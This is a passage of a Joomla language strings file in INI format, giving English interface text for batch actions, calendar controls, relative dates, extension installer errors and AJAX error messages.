JLIB_HTML_BATCH_LANGUAGE_LABEL_DESC="Not making a selection will keep the original language when processing."
JLIB_HTML_BATCH_LANGUAGE_NOCHANGE="- Keep original Language -"
JLIB_HTML_BATCH_MENU_LABEL="To Move or Copy your selection please select a Category."
JLIB_HTML_BATCH_MOVE="Move"
JLIB_HTML_BATCH_MOVE_QUESTION="Do you want to move the items or make a copy of them?"
JLIB_HTML_BATCH_NO_CATEGORY="- Don't move or copy -"
JLIB_HTML_BATCH_NOCHANGE="- Keep original Access Levels -"
JLIB_HTML_BATCH_TAG_LABEL="Add Tag"
JLIB_HTML_BATCH_TAG_LABEL_DESC="Add a tag to selected items."
JLIB_HTML_BATCH_TAG_NOCHANGE="- Keep original Tags -"
JLIB_HTML_BATCH_USER_LABEL="Set User."
JLIB_HTML_BATCH_USER_LABEL_DESC="Not making a selection will keep the original user when processing."
JLIB_HTML_BATCH_USER_NOCHANGE="- Keep original User -"
JLIB_HTML_BATCH_USER_NOUSER="No User."
JLIB_HTML_BEHAVIOR_ABOUT_THE_CALENDAR="About the Calendar"
JLIB_HTML_BEHAVIOR_CLOSE="Close"
JLIB_HTML_BEHAVIOR_DATE_SELECTION="Date selection:\n"
JLIB_HTML_BEHAVIOR_DISPLAY_S_FIRST="Display %s first"
JLIB_HTML_BEHAVIOR_DRAG_TO_MOVE="Drag to move."
JLIB_HTML_BEHAVIOR_GO_TODAY="Go to today"
JLIB_HTML_BEHAVIOR_GREEN="Green"
JLIB_HTML_BEHAVIOR_HOLD_MOUSE="- Hold mouse button on any of the buttons above for faster selection."
JLIB_HTML_BEHAVIOR_MONTH_SELECT="- Use the < and > buttons to select month\n"
JLIB_HTML_BEHAVIOR_NEXT_MONTH_HOLD_FOR_MENU="Select to move to the next month. Select and hold for a list of the months."
JLIB_HTML_BEHAVIOR_NEXT_YEAR_HOLD_FOR_MENU="Select to move to the next year. Select and hold for a list of years."
JLIB_HTML_BEHAVIOR_OPEN_CALENDAR="Open the calendar"
JLIB_HTML_BEHAVIOR_PREV_MONTH_HOLD_FOR_MENU="Select to move to the previous month. Select and hold for a list of the months."
JLIB_HTML_BEHAVIOR_PREV_YEAR_HOLD_FOR_MENU="Select to move to the previous year. Select and hold for a list of years."
JLIB_HTML_BEHAVIOR_SELECT_DATE="Select a date."
JLIB_HTML_BEHAVIOR_SHIFT_CLICK_OR_DRAG_TO_CHANGE_VALUE="(Shift-)Select or Drag to change the value."
JLIB_HTML_BEHAVIOR_TIME="Time:"
JLIB_HTML_BEHAVIOR_TODAY="Today"
JLIB_HTML_BEHAVIOR_TT_DATE_FORMAT="%a, %b %e"
JLIB_HTML_BEHAVIOR_WK="wk"
JLIB_HTML_BEHAVIOR_YEAR_SELECT="- Use the « and » buttons to select year\n"
JLIB_HTML_BUTTON_BASE_CLASS="Could not load button base class."
JLIB_HTML_BUTTON_NO_LOAD="Could not load button %s (%s);"
JLIB_HTML_BUTTON_NOT_DEFINED="Button not defined for type = %s"
JLIB_HTML_CALENDAR="Calendar"
JLIB_HTML_CHECKED_OUT="Checked out"
JLIB_HTML_CHECKIN="Check-in"
JLIB_HTML_CLOAKING="This email address is being protected from spambots. You need JavaScript enabled to view it."
JLIB_HTML_DATE_RELATIVE_DAYS="%s days ago."
JLIB_HTML_DATE_RELATIVE_DAYS_1="%s day ago."
JLIB_HTML_DATE_RELATIVE_DAYS_0="%s days ago."
JLIB_HTML_DATE_RELATIVE_HOURS="%s hours ago."
JLIB_HTML_DATE_RELATIVE_HOURS_1="%s hour ago."
JLIB_HTML_DATE_RELATIVE_HOURS_0="%s hours ago."
JLIB_HTML_DATE_RELATIVE_LESSTHANAMINUTE="Less than a minute ago."
JLIB_HTML_DATE_RELATIVE_MINUTES="%s minutes ago."
JLIB_HTML_DATE_RELATIVE_MINUTES_1="%s minute ago."
JLIB_HTML_DATE_RELATIVE_MINUTES_0="%s minutes ago."
JLIB_HTML_DATE_RELATIVE_WEEKS="%s weeks ago."
JLIB_HTML_DATE_RELATIVE_WEEKS_1="%s week ago."
JLIB_HTML_DATE_RELATIVE_WEEKS_0="%s weeks ago."
JLIB_HTML_EDIT_MENU_ITEM="Edit menu item."
JLIB_HTML_EDIT_MENU_ITEM_ID="Item ID: %s"
JLIB_HTML_EDIT_MODULE="Edit module"
JLIB_HTML_EDIT_MODULE_IN_POSITION="Position: %s"
JLIB_HTML_EDITOR_CANNOT_LOAD="Can't load the editor."
JLIB_HTML_END="End"
JLIB_HTML_ERROR_FUNCTION_NOT_SUPPORTED="Function not supported."
JLIB_HTML_ERROR_NOTFOUNDINFILE="%s: :%s not found in file."
JLIB_HTML_ERROR_NOTSUPPORTED_NOFILE="%s: :%s not supported. File not found."
JLIB_HTML_ERROR_NOTSUPPORTED="%s: :%s not supported."
JLIB_HTML_GOTO_PAGE="Go to page %s"
JLIB_HTML_GOTO_POSITION="Go to %s page"
JLIB_HTML_MOVE_DOWN="Move Down"
JLIB_HTML_MOVE_UP="Move Up"
JLIB_HTML_NO_PARAMETERS_FOR_THIS_ITEM="There are no parameters for this item."
JLIB_HTML_NO_RECORDS_FOUND="No records found."
JLIB_HTML_PAGE_CURRENT="Page %s"
JLIB_HTML_PAGE_CURRENT_OF_TOTAL="Page %s of %s"
JLIB_HTML_PAGINATION="Pagination"
JLIB_HTML_PLEASE_MAKE_A_SELECTION_FROM_THE_LIST="Please first make a selection from the list."
JLIB_HTML_PUBLISH_ITEM="Publish Item"
JLIB_HTML_PUBLISHED_EXPIRED_ITEM="Published, but has Expired."
JLIB_HTML_PUBLISHED_FINISHED="Finish: %s"
JLIB_HTML_PUBLISHED_ITEM="Published and is Current."
JLIB_HTML_PUBLISHED_PENDING_ITEM="Published, but is Pending."
JLIB_HTML_PUBLISHED_START="Start: %s"
JLIB_HTML_RESULTS_OF="Results %s - %s of %s"
JLIB_HTML_SAVE_ORDER="Save Order"
JLIB_HTML_SELECT_STATE="Select State"
JLIB_HTML_START="Start"
JLIB_HTML_UNPUBLISH_ITEM="Unpublish Item"
JLIB_HTML_VIEW_ALL="View All"
JLIB_HTML_SETDEFAULT_ITEM="Set default"
JLIB_HTML_UNSETDEFAULT_ITEM="Unset default"

JLIB_INSTALLER_ABORT="Aborting language installation: %s"
JLIB_INSTALLER_ABORT_ALREADYINSTALLED="Extension is already installed."
JLIB_INSTALLER_ABORT_ALREADY_EXISTS="Extension %1$s: Extension %2$s already exists."
JLIB_INSTALLER_ABORT_COMP_BUILDADMINMENUS_FAILED="Error building Administrator Menus."
JLIB_INSTALLER_ABORT_COMP_COPY_MANIFEST="Component %1$s: Could not copy PHP manifest file."
JLIB_INSTALLER_ABORT_COMP_COPY_SETUP="Component %1$s: Could not copy setup file."
JLIB_INSTALLER_ABORT_COMP_FAIL_ADMIN_FILES="Component %s: Failed to copy administrator files."
JLIB_INSTALLER_ABORT_COMP_FAIL_SITE_FILES="Component %s: Failed to copy site files."
JLIB_INSTALLER_ABORT_COMP_INSTALL_COPY_SETUP="Component Install: Could not copy setup file."
JLIB_INSTALLER_ABORT_COMP_INSTALL_CUSTOM_INSTALL_FAILURE="Component Install: Custom install routine failure."
JLIB_INSTALLER_ABORT_COMP_INSTALL_MANIFEST="Component Install: Could not copy PHP manifest file."
JLIB_INSTALLER_ABORT_COMP_INSTALL_PHP_INSTALL="Component Install: Could not copy PHP install file."
JLIB_INSTALLER_ABORT_COMP_INSTALL_PHP_UNINSTALL="Component Install: Could not copy PHP uninstall file."
JLIB_INSTALLER_ABORT_COMP_INSTALL_ROLLBACK="Component Install: %s"
JLIB_INSTALLER_ABORT_COMP_INSTALL_SQL_ERROR="Component Install: SQL error file %s"
JLIB_INSTALLER_ABORT_COMP_UPDATESITEMENUS_FAILED="Component Install: Failed to update menu items."
JLIB_INSTALLER_ABORT_COMP_UPDATE_ADMIN_ELEMENT="Component Update: The XML file did not have an administration element."
JLIB_INSTALLER_ABORT_COMP_UPDATE_COPY_SETUP="Component Update: Could not copy setup file."
JLIB_INSTALLER_ABORT_COMP_UPDATE_MANIFEST="Component Update: Could not copy PHP manifest file."
JLIB_INSTALLER_ABORT_COMP_UPDATE_PHP_INSTALL="Component Update: Could not copy PHP install file."
JLIB_INSTALLER_ABORT_COMP_UPDATE_PHP_UNINSTALL="Component Update: Could not copy PHP uninstall file."
JLIB_INSTALLER_ABORT_COMP_UPDATE_ROLLBACK="Component Update: %s"
JLIB_INSTALLER_ABORT_COMP_UPDATE_SQL_ERROR="Component Update: SQL error file %s"
JLIB_INSTALLER_ABORT_CREATE_DIRECTORY="Extension %1$s: Failed to create folder: %2$s"
JLIB_INSTALLER_ABORT_DEBUG="Installation unexpectedly stopped:"
JLIB_INSTALLER_ABORT_DETECTMANIFEST="Unable to detect manifest file."
JLIB_INSTALLER_ABORT_DIRECTORY="Extension %1$s: Another %2$s is already using the named folder: %3$s. Are you trying to install the same extension again?"
JLIB_INSTALLER_ABORT_ERROR_DELETING_EXTENSIONS_RECORD="Could not delete the extension's record from the database."
JLIB_INSTALLER_ABORT_EXTENSIONNOTVALID="Extension is not valid."
JLIB_INSTALLER_ABORT_FILE_INSTALL_COPY_SETUP="Files Install: Could not copy setup file."
JLIB_INSTALLER_ABORT_FILE_INSTALL_CUSTOM_INSTALL_FAILURE="Files Install: Custom install routine failure."
JLIB_INSTALLER_ABORT_FILE_INSTALL_FAIL_SOURCE_DIRECTORY="Files Install: Failed to find source folder: %s"
JLIB_INSTALLER_ABORT_FILE_INSTALL_ROLLBACK="Files Install: %s"
JLIB_INSTALLER_ABORT_FILE_INSTALL_SQL_ERROR="Files %1$s: SQL error file %2$s"
JLIB_INSTALLER_ABORT_FILE_ROLLBACK="Files Install: %s"
JLIB_INSTALLER_ABORT_FILE_SAME_NAME="Files Install: Another extension with same name already exists."
JLIB_INSTALLER_ABORT_FILE_UPDATE_SQL_ERROR="Files Update: SQL error file %s"
JLIB_INSTALLER_ABORT_INSTALL_CUSTOM_INSTALL_FAILURE="Extension %s: Custom install routine failure."
JLIB_INSTALLER_ABORT_LIB_COPY_FILES="Library %s: Could not copy files from the source."
JLIB_INSTALLER_ABORT_LIB_INSTALL_ALREADY_INSTALLED="Library Install: Library already installed."
JLIB_INSTALLER_ABORT_LIB_INSTALL_COPY_SETUP="Library Install: Could not copy setup file."
JLIB_INSTALLER_ABORT_LIB_INSTALL_CORE_FOLDER="Library Install: Library has the same name as a core folder."
JLIB_INSTALLER_ABORT_LIB_INSTALL_FAILED_TO_CREATE_DIRECTORY="Library Install: Failed to create folder: %s"
JLIB_INSTALLER_ABORT_LIB_INSTALL_NOFILE="Library Install: No library file specified."
JLIB_INSTALLER_ABORT_LIB_INSTALL_ROLLBACK="Library Install: %s"
JLIB_INSTALLER_ABORT_LOAD_DETAILS="Failed to load extension details."
JLIB_INSTALLER_ABORT_MANIFEST="Extension %1$s: Could not copy PHP manifest file."
JLIB_INSTALLER_ABORT_METHODNOTSUPPORTED="Method not supported for this extension type."
JLIB_INSTALLER_ABORT_METHODNOTSUPPORTED_TYPE="Method not supported for this extension type: %s"
JLIB_INSTALLER_ABORT_MOD_COPY_FILES="Module %s: Could not copy files from the source."
JLIB_INSTALLER_ABORT_MOD_INSTALL_COPY_SETUP="Module Install: Could not copy setup file."
JLIB_INSTALLER_ABORT_MOD_INSTALL_CREATE_DIRECTORY="Module %1$s: Failed to create folder: %2$s"
JLIB_INSTALLER_ABORT_MOD_INSTALL_CUSTOM_INSTALL_FAILURE="Module Install: Custom install routine failure."
JLIB_INSTALLER_ABORT_MOD_INSTALL_DIRECTORY="Module %1$s: Another module is already using folder: %2$s"
JLIB_INSTALLER_ABORT_MOD_INSTALL_MANIFEST="Module Install: Could not copy PHP manifest file."
JLIB_INSTALLER_ABORT_MOD_INSTALL_NOFILE="Module %s: No module file specified."
JLIB_INSTALLER_ABORT_MOD_INSTALL_SQL_ERROR="Module %1$s: SQL error file %2$s"
JLIB_INSTALLER_ABORT_MOD_ROLLBACK="Module %1$s: %2$s"
JLIB_INSTALLER_ABORT_MOD_UNINSTALL_UNKNOWN_CLIENT="Module Uninstall: Unknown client type [%s]"
JLIB_INSTALLER_ABORT_MOD_UNKNOWN_CLIENT="Module %1$s: Unknown client type [%2$s]"
JLIB_INSTALLER_ABORT_NOINSTALLPATH="Install path does not exist."
JLIB_INSTALLER_ABORT_NOUPDATEPATH="Update path does not exist."
JLIB_INSTALLER_ABORT_PACK_INSTALL_COPY_SETUP="Package Install: Could not copy setup file."
JLIB_INSTALLER_ABORT_PACK_INSTALL_CREATE_DIRECTORY="Package Install: Failed to create folder: %s."
JLIB_INSTALLER_ABORT_PACKAGE_INSTALL_CUSTOM_INSTALL_FAILURE="Package Install: Custom install routine failure."
JLIB_INSTALLER_ABORT_PACKAGE_INSTALL_MANIFEST="Installation failed: Could not copy PHP manifest file."
JLIB_INSTALLER_ABORT_PACK_INSTALL_ERROR_EXTENSION="Package %1$s: There was an error installing an extension: %2$s"
JLIB_INSTALLER_ABORT_PACK_INSTALL_NO_FILES="Package %s: There were no files to install!"
JLIB_INSTALLER_ABORT_PACK_INSTALL_NO_PACK="Package %s: No package file specified."
JLIB_INSTALLER_ABORT_PACK_INSTALL_ROLLBACK="Package Install: %s"
JLIB_INSTALLER_ABORT_PLG_COPY_FILES="Plugin %s: Could not copy files from the source."
JLIB_INSTALLER_ABORT_PLG_INSTALL_ALLREADY_EXISTS="Plugin %1$s: Plugin %2$s already exists."
JLIB_INSTALLER_ABORT_PLG_INSTALL_COPY_SETUP="Plugin %s: Could not copy setup file."
JLIB_INSTALLER_ABORT_PLG_INSTALL_CREATE_DIRECTORY="Plugin %1$s: Failed to create folder: %2$s"
JLIB_INSTALLER_ABORT_PLG_INSTALL_CUSTOM_INSTALL_FAILURE="Plugin Install: Custom install routine failure."
JLIB_INSTALLER_ABORT_PLG_INSTALL_DIRECTORY="Plugin %1$s: Another plugin is already using folder: %2$s"
JLIB_INSTALLER_ABORT_PLG_INSTALL_MANIFEST="Plugin %s: Could not copy PHP manifest file."
JLIB_INSTALLER_ABORT_PLG_INSTALL_NO_FILE="Plugin %s: No plugin file specified."
JLIB_INSTALLER_ABORT_PLG_INSTALL_ROLLBACK="Plugin %1$s: %2$s"
JLIB_INSTALLER_ABORT_PLG_INSTALL_SQL_ERROR="Plugin %1$s: SQL error file %2$s"
JLIB_INSTALLER_ABORT_PLG_UNINSTALL_SQL_ERROR="Plugin Uninstall: SQL error file %s"
JLIB_INSTALLER_ABORT_REFRESH_MANIFEST_CACHE="Refresh Manifest Cache failed: %s Extension is not currently installed."
JLIB_INSTALLER_ABORT_REFRESH_MANIFEST_CACHE_VALID="Refresh Manifest Cache failed: Extension is not valid."
JLIB_INSTALLER_ABORT_ROLLBACK="Extension %1$s: %2$s"
JLIB_INSTALLER_ABORT_SQL_ERROR="Extension %1$s: SQL error processing query: %2$s"
JLIB_INSTALLER_ABORT_TPL_INSTALL_ALREADY_INSTALLED="Template Install: Template already installed."
JLIB_INSTALLER_ABORT_TPL_INSTALL_ANOTHER_TEMPLATE_USING_DIRECTORY="Template Install: There is already a Template using the named folder: %s. Are you trying to install the same template again?"
JLIB_INSTALLER_ABORT_TPL_INSTALL_COPY_FILES="Template Install: Could not copy files from the %s source."
JLIB_INSTALLER_ABORT_TPL_INSTALL_COPY_SETUP="Template Install: Could not copy setup file."
JLIB_INSTALLER_ABORT_TPL_INSTALL_FAILED_CREATE_DIRECTORY="Template Install: Failed to create folder: %s"
JLIB_INSTALLER_ABORT_TPL_INSTALL_ROLLBACK="Template Install: %s"
JLIB_INSTALLER_ABORT_TPL_INSTALL_UNKNOWN_CLIENT="Template Install: Unknown client type [%s]"
JLIB_INSTALLER_AVAILABLE_UPDATE_PHP_VERSION="For the extension %1$s version %2$s is available, but it requires at least PHP version %3$s while your system only has %4$s"
JLIB_INSTALLER_AVAILABLE_UPDATE_DB_MINIMUM="For the extension %1$s version %2$s is available, but your current database %3$s is version %4$s and is not supported. Please contact your web host to update your Database version to at least version %5$s."
JLIB_INSTALLER_AVAILABLE_UPDATE_DB_TYPE="For the extension %1$s version %2$s is available, but your current database %3$s is not supported anymore."
JLIB_INSTALLER_PURGED_UPDATES="Cleared updates"
JLIB_INSTALLER_FAILED_TO_PURGE_UPDATES="Failed to clear updates."
JLIB_INSTALLER_DEFAULT_STYLE="%s - Default"
JLIB_INSTALLER_DISCOVER="Discover"
JLIB_INSTALLER_ERROR_CANNOT_UNINSTALL_CHILD_OF_PACKAGE="The %s extension is part of a package which does not allow individual extensions to be uninstalled."
JLIB_INSTALLER_ERROR_COMP_DISCOVER_STORE_DETAILS="Component Discover install: Failed to store component details."
JLIB_INSTALLER_ERROR_COMP_FAILED_TO_CREATE_DIRECTORY="Component %1$s: Failed to create folder: %2$s."
JLIB_INSTALLER_ERROR_COMP_INSTALL_ADMIN_ELEMENT="Component Install: The XML file did not have an administration element."
JLIB_INSTALLER_ERROR_COMP_INSTALL_DIR_ADMIN="Component Install: Another component is already using folder: %s"
JLIB_INSTALLER_ERROR_COMP_INSTALL_DIR_SITE="Component Install: Another component is already using folder: %s"
JLIB_INSTALLER_ERROR_COMP_INSTALL_FAILED_TO_CREATE_DIRECTORY_ADMIN="Component Install: Failed to create administrator folder: %s"
JLIB_INSTALLER_ERROR_COMP_INSTALL_FAILED_TO_CREATE_DIRECTORY_SITE="Component Install: Failed to create site folder: %s"
JLIB_INSTALLER_ERROR_COMP_REFRESH_MANIFEST_CACHE="Component Refresh manifest cache: Failed to store component details."
JLIB_INSTALLER_ERROR_COMP_REMOVING_ADMIN_MENUS_FAILED="Could not delete the Administrator menus."
JLIB_INSTALLER_ERROR_COMP_UNINSTALL_CUSTOM="Component Uninstall: Custom Uninstall script unsuccessful."
JLIB_INSTALLER_ERROR_COMP_UNINSTALL_FAILED_DELETE_CATEGORIES="Component Uninstall: Unable to delete the component categories."
JLIB_INSTALLER_ERROR_COMP_UNINSTALL_ERRORREMOVEMANUALLY="Component Uninstall: Can't uninstall. Please remove manually."
JLIB_INSTALLER_ERROR_COMP_UNINSTALL_ERRORUNKOWNEXTENSION="Component Uninstall: Unknown Extension."
JLIB_INSTALLER_ERROR_COMP_UNINSTALL_FAILED_REMOVE_DIRECTORY_ADMIN="Component Uninstall: Unable to remove the component administrator folder."
JLIB_INSTALLER_ERROR_COMP_UNINSTALL_FAILED_REMOVE_DIRECTORY_SITE="Component Uninstall: Unable to remove the component site folder."
JLIB_INSTALLER_ERROR_COMP_UNINSTALL_NO_OPTION="Component Uninstall: Option field empty, can't remove files."
JLIB_INSTALLER_ERROR_COMP_UNINSTALL_SQL_ERROR="Component Uninstall: SQL error file %s"
JLIB_INSTALLER_ERROR_COMP_UNINSTALL_WARNCORECOMPONENT="Component Uninstall: Trying to uninstall a core component."
JLIB_INSTALLER_ERROR_COMP_UPDATE_FAILED_TO_CREATE_DIRECTORY_ADMIN="Component Update: Failed to create administrator folder: %s"
JLIB_INSTALLER_ERROR_COMP_UPDATE_FAILED_TO_CREATE_DIRECTORY_SITE="Component Update: Failed to create site folder: %s"
JLIB_INSTALLER_ERROR_CREATE_DIRECTORY="JInstaller: :Install: Failed to create folder: %s"
JLIB_INSTALLER_ERROR_CREATE_FOLDER_FAILED="Failed to create folder [%s]"
JLIB_INSTALLER_ERROR_DEPRECATED_FORMAT="Deprecated install format (client="_QQ_"both"_QQ_"), use package installer in future."
JLIB_INSTALLER_ERROR_DISCOVER_INSTALL_UNSUPPORTED="A %s extension can not be installed using the discover method. Please install this extension from Extension Manager: Install."
JLIB_INSTALLER_ERROR_DOWNGRADE="Sorry! You cannot downgrade from version %s to %s"
JLIB_INSTALLER_ERROR_DOWNLOAD_SERVER_CONNECT="Error connecting to the server: %s"
JLIB_INSTALLER_ERROR_FAIL_COPY_FILE="JInstaller: :Install: Failed to copy file %1$s to %2$s"
JLIB_INSTALLER_ERROR_FAIL_COPY_FOLDER="JInstaller: :Install: Failed to copy folder %1$s to %2$s"
JLIB_INSTALLER_ERROR_FAILED_READING_NETWORK_RESOURCES="Failed reading network resource: %s"
JLIB_INSTALLER_ERROR_FILE_EXISTS="JInstaller: :Install: File already exists %s"
JLIB_INSTALLER_ERROR_FILE_FOLDER="Error on deleting file or folder %s"
JLIB_INSTALLER_ERROR_FILE_UNINSTALL_INVALID_MANIFEST="Files Uninstall: Invalid manifest file."
JLIB_INSTALLER_ERROR_FILE_UNINSTALL_INVALID_NOTFOUND_MANIFEST="Files Uninstall: Manifest file invalid or not found."
JLIB_INSTALLER_ERROR_FILE_UNINSTALL_LOAD_ENTRY="Files Uninstall: Could not load extension entry."
JLIB_INSTALLER_ERROR_FILE_UNINSTALL_LOAD_MANIFEST="Files Uninstall: Could not load manifest file."
JLIB_INSTALLER_ERROR_FILE_UNINSTALL_SQL_ERROR="Files Uninstall: SQL error file %s"
JLIB_INSTALLER_ERROR_FILE_UNINSTALL_WARNCOREFILE="File Uninstall: Trying to uninstall core files."
JLIB_INSTALLER_ERROR_FOLDER_IN_USE="Another extension is already using folder [%s]"
JLIB_INSTALLER_ERROR_LANG_DISCOVER_STORE_DETAILS="Language Discover install: Failed to store language details."
JLIB_INSTALLER_ERROR_LANG_UNINSTALL_DEFAULT="This language can't be uninstalled as long as it is defined as a default language."
JLIB_INSTALLER_ERROR_LANG_UNINSTALL_DIRECTORY="Language Uninstall: Unable to remove the specified Language folder."
JLIB_INSTALLER_ERROR_LANG_UNINSTALL_ELEMENT_EMPTY="Language Uninstall: Element is empty, can't uninstall files."
JLIB_INSTALLER_ERROR_LANG_UNINSTALL_PATH_EMPTY="Language Uninstall: Language path is empty, can't uninstall files."
JLIB_INSTALLER_ERROR_LANG_UNINSTALL_PROTECTED="This language can't be uninstalled. It is protected in the database (usually en-GB)."
JLIB_INSTALLER_ERROR_LIB_DISCOVER_STORE_DETAILS="Library Discover install: Failed to store library details."
JLIB_INSTALLER_ERROR_LIB_REFRESH_MANIFEST_CACHE="Library Refresh manifest cache: Failed to store library details."
JLIB_INSTALLER_ERROR_LIB_UNINSTALL_INVALID_MANIFEST="Library Uninstall: Invalid manifest file."
JLIB_INSTALLER_ERROR_LIB_UNINSTALL_INVALID_NOTFOUND_MANIFEST="Library Uninstall: Manifest file invalid or not found."
JLIB_INSTALLER_ERROR_LIB_UNINSTALL_LOAD_MANIFEST="Library Uninstall: Could not load manifest file."
JLIB_INSTALLER_ERROR_LIB_UNINSTALL_WARNCORELIBRARY="Library Uninstall: Trying to uninstall a core library."
JLIB_INSTALLER_ERROR_LOAD_XML="JInstaller: :Install: Failed to load XML File: %s"
JLIB_INSTALLER_ERROR_MOD_DISCOVER_STORE_DETAILS="Module Discover install: Failed to store module details."
JLIB_INSTALLER_ERROR_MOD_REFRESH_MANIFEST_CACHE="Module Refresh manifest cache: Failed to store module details."
JLIB_INSTALLER_ERROR_MOD_UNINSTALL_ERRORUNKOWNEXTENSION="Module Uninstall: Unknown Extension."
JLIB_INSTALLER_ERROR_MOD_UNINSTALL_EXCEPTION="Module Uninstall: %s"
JLIB_INSTALLER_ERROR_MOD_UNINSTALL_INVALID_NOTFOUND_MANIFEST="Module Uninstall: Manifest file invalid or not found."
JLIB_INSTALLER_ERROR_MOD_UNINSTALL_SQL_ERROR="Module Uninstall: SQL error file %s"
JLIB_INSTALLER_ERROR_MOD_UNINSTALL_WARNCOREMODULE="Module Uninstall: Trying to uninstall a core module: %s"
JLIB_INSTALLER_ERROR_NO_CORE_LANGUAGE="No core pack exists for the language [%s]"
JLIB_INSTALLER_ERROR_NO_FILE="JInstaller: :Install: File does not exist %s"
JLIB_INSTALLER_ERROR_NO_LANGUAGE_TAG="The package did not specify a language tag. Are you trying to install an old language package?"
JLIB_INSTALLER_ERROR_NOTFINDJOOMLAXMLSETUPFILE="JInstaller: :Install: Can't find Joomla XML setup file."
JLIB_INSTALLER_ERROR_NOTFINDXMLSETUPFILE="JInstaller: :Install: Can't find XML setup file."
JLIB_INSTALLER_ERROR_PACK_REFRESH_MANIFEST_CACHE="Package Refresh manifest cache: Failed to store package details."
JLIB_INSTALLER_ERROR_PACK_SETTING_PACKAGE_ID="Could not record the package ID for this package's extensions."
JLIB_INSTALLER_ERROR_PACK_UNINSTALL_INVALID_MANIFEST="Package Uninstall: Invalid manifest file."
JLIB_INSTALLER_ERROR_PACK_UNINSTALL_INVALID_NOTFOUND_MANIFEST="Package Uninstall: Manifest file invalid or not found: %s"
JLIB_INSTALLER_ERROR_PACK_UNINSTALL_LOAD_MANIFEST="Package Uninstall: Could not load manifest file."
JLIB_INSTALLER_ERROR_PACK_UNINSTALL_MANIFEST_NOT_REMOVED="Package Uninstall: Errors were detected, manifest file not removed!"
JLIB_INSTALLER_ERROR_PACK_UNINSTALL_MISSINGMANIFEST="Package Uninstall: Missing manifest file."
JLIB_INSTALLER_ERROR_PACK_UNINSTALL_NOT_PROPER="Package Uninstall: This extension may have already been uninstalled or might not have been uninstall properly: %s"
JLIB_INSTALLER_ERROR_PACK_UNINSTALL_WARNCOREPACK="Package Uninstall: Trying to uninstall core package."
JLIB_INSTALLER_ERROR_PLG_DISCOVER_STORE_DETAILS="Plugin Discover install: Failed to store plugin details."
JLIB_INSTALLER_ERROR_PLG_REFRESH_MANIFEST_CACHE="Plugin Refresh manifest cache: Failed to store plugin details."
JLIB_INSTALLER_ERROR_PLG_UNINSTALL_ERRORUNKOWNEXTENSION="Plugin Uninstall: Unknown Extension."
JLIB_INSTALLER_ERROR_PLG_UNINSTALL_FOLDER_FIELD_EMPTY="Plugin Uninstall: Folder field empty, can't remove files."
JLIB_INSTALLER_ERROR_PLG_UNINSTALL_INVALID_MANIFEST="Plugin Uninstall: Invalid manifest file."
JLIB_INSTALLER_ERROR_PLG_UNINSTALL_INVALID_NOTFOUND_MANIFEST="Plugin Uninstall: Manifest file invalid or not found."
JLIB_INSTALLER_ERROR_PLG_UNINSTALL_LOAD_MANIFEST="Plugin Uninstall: Could not load manifest file."
JLIB_INSTALLER_ERROR_PLG_UNINSTALL_WARNCOREPLUGIN="Plugin Uninstall: Trying to uninstall a core plugin: %s"
JLIB_INSTALLER_ERROR_SQL_ERROR="JInstaller: :Install: Error SQL %s"
JLIB_INSTALLER_ERROR_SQL_FILENOTFOUND="JInstaller: :Install: SQL File not found %s"
JLIB_INSTALLER_ERROR_SQL_READBUFFER="JInstaller: :Install: SQL File Buffer Read Error."
JLIB_INSTALLER_ERROR_TPL_DISCOVER_STORE_DETAILS="Template Discover install: Failed to store template details."
JLIB_INSTALLER_ERROR_TPL_REFRESH_MANIFEST_CACHE="Template Refresh manifest cache: Failed to store template details."
JLIB_INSTALLER_ERROR_TPL_UNINSTALL_ERRORUNKOWNEXTENSION="Template Uninstall: Unknown Extension."
JLIB_INSTALLER_ERROR_TPL_UNINSTALL_INVALID_CLIENT="Template Uninstall: Invalid client."
JLIB_INSTALLER_ERROR_TPL_UNINSTALL_INVALID_NOTFOUND_MANIFEST="Template Uninstall: Manifest file invalid or not found."
JLIB_INSTALLER_ERROR_TPL_UNINSTALL_TEMPLATE_DEFAULT="Template Uninstall: Can't remove default template."
JLIB_INSTALLER_ERROR_TPL_UNINSTALL_TEMPLATE_DIRECTORY="Template Uninstall: Folder does not exist, can't remove files."
JLIB_INSTALLER_ERROR_TPL_UNINSTALL_TEMPLATE_ID_EMPTY="Template Uninstall: Template ID is empty, can't uninstall files."
JLIB_INSTALLER_ERROR_TPL_UNINSTALL_WARNCORETEMPLATE="Template Uninstall: Trying to uninstall a core template: %s"
JLIB_INSTALLER_ERROR_UNKNOWN_CLIENT_TYPE="Unknown Client Type [%s]"
JLIB_INSTALLER_FILE_ERROR_MOVE="Error on moving file %s"
JLIB_INSTALLER_INCORRECT_SEQUENCE="Downgrading from version %1$s to version %2$s is not allowed."
JLIB_INSTALLER_INSTALL="Install"
JLIB_INSTALLER_MINIMUM_JOOMLA="You don't have the minimum Joomla version requirement of J%s"
JLIB_INSTALLER_MINIMUM_PHP="Your server doesn't meet the minimum PHP version requirement of %s"
JLIB_INSTALLER_NOTICE_LANG_RESET_USERS="Language set to Default for %d users."
JLIB_INSTALLER_NOTICE_LANG_RESET_USERS_1="Language set to Default for %d user."
JLIB_INSTALLER_UNINSTALL="Uninstall"
JLIB_INSTALLER_UPDATE="Update"
JLIB_INSTALLER_ERROR_EXTENSION_INVALID_CLIENT_IDENTIFIER="Invalid client identifier specified in extension manifest."
JLIB_INSTALLER_ERROR_PACK_UNINSTALL_UNKNOWN_EXTENSION="Trying to uninstall unknown extension from package. This extension may have already been removed earlier."
JLIB_INSTALLER_NOT_ERROR="If the error is related to the installation of TinyMCE language files it has no effect on the installation of the language(s). Some language packs created prior to Joomla! 3.2.0 may try to install separate TinyMCE language files. As these are now included in the core they no longer need to be installed."
JLIB_INSTALLER_UPDATE_LOG_QUERY="Ran query from file %1$s. Query text: %2$s."
JLIB_INSTALLER_WARNING_UNABLE_TO_INSTALL_CONTENT_LANGUAGE="Unable to create a content language for %s language: %s"

JLIB_JS_AJAX_ERROR_CONNECTION_ABORT="A connection abort has occurred while fetching the JSON data."
JLIB_JS_AJAX_ERROR_NO_CONTENT="No content was returned."
JLIB_JS_AJAX_ERROR_OTHER="An error has occurred while fetching the JSON data: HTTP %s status code."
JLIB_JS_AJAX_ERROR_PARSE="A parse error has occurred while processing the following JSON data:<br/><code style="_QQ_"color:inherit;white-space:pre-wrap;padding:0;margin:0;border:0;background:inherit;"_QQ_">%s</code>"
JLIB_JS_AJAX_ERROR_TIMEOUT="A timeout has occurred while fetching the JSON data."

JLIB_LANGUAGE_ERROR_CANNOT_LOAD_METAFILE="Could not load %s language XML file from %s."
JLIB_LANGUAGE_ERROR_CANNOT_LOAD_METADATA="Could not load %s metadata from %s."

